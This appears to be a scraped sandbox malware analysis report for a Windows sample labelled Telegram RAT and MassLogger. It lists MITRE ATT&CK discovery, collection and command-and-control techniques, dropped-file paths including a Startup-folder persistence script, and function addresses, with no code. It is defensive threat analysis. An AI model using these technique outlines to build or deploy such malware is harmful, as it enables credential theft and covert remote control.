
Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report eLo1khn7DQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut9811.tmp

C:\Users\user\AppData\Local\Temp\autA05E.tmp

C:\Users\user\AppData\Local\Temp\autD614.tmp

C:\Users\user\AppData\Local\Temp\ophiolatrous

C:\Users\user\AppData\Local\done\lustring.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
eLo1khn7DQ.exe

Function 001F42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 001F42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00232BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 001F2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00228D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Function 0023065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 001F344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 001F2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 001F3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre